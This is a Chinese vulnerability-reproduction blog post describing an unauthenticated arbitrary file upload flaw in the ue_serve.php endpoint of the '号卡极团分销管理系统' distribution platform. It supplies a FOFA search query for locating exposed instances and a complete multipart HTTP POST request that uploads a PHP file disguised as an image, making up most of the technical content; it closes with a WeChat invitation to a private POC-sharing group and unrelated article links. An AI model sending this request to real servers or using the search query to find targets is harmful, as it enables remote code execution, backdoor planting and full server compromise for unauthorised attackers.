【漏洞复现】号卡极团分销管理系统 ue_serve.php 任意文件上传漏洞

0x01 产品简介

号卡极团分销 管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U|+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接.

0x02 漏洞概述

号卡极团分销管理系统 ue_serve.php 存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 搜索语法

bash 复制代码
FOFA:icon_hash="-795291075"

0x04 漏洞复现

bash 复制代码
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
 
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="name"
 
test.php
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: image/jpeg
 
<?php print(111*222);unlink(__FILE__);?>
------WebKitFormBoundarylkv1kpsZgzw2WC03--

0x05 工具批量

nuclei

afrog

xray

POC获取

请使用VX扫一扫加入内部POC分享圈子

相关推荐
西洼工作室6 天前
前端直传OSS服务端签名(Policy+Signature)/STS临时凭证
前端·文件上传·oss
他是龙5518 天前
Upload-Labs (Pass-01 ~ Pass-21) 完全通关指南
文件上传
其实防守也摸鱼11 天前
Upload-labs:部署靶场及Pass-01实战解析
服务器·网络·安全·web安全·教程·文件上传·工具
探索者0120 天前
Upoad靶场--文件上传
安全·文件上传·upload靶场
探索者0120 天前
文件上传漏洞指南:原理+绕过手法与靶场实战
安全·web安全·文件上传
探索宇宙真理.25 天前
Vvveb CMS 任意文件上传导致RCE | CVE-2026-6257原理分析&研究
经验分享·开源·文件上传·安全漏洞·vvveb
~ rainbow~1 个月前
前端转型全栈(六)——深入浅出:文件上传的原理与进阶
前端·http·文件上传
阿飞不想努力1 个月前
文件上传原理与实操
java·spring boot·vue·文件上传
Cxiaomu1 个月前
Flutter 录制视频+大文件上传 MinIO + NodeJS落库
flutter·音视频·文件上传
叫我一声阿雷吧1 个月前
原生 JS 实现图片预览上传组件:多图上传 + 拖拽上传 + 裁剪预览 + 进度显示(附完整源码)
图片上传·canvas·文件上传·响应式布局·拖拽上传·原生javascript·filereader api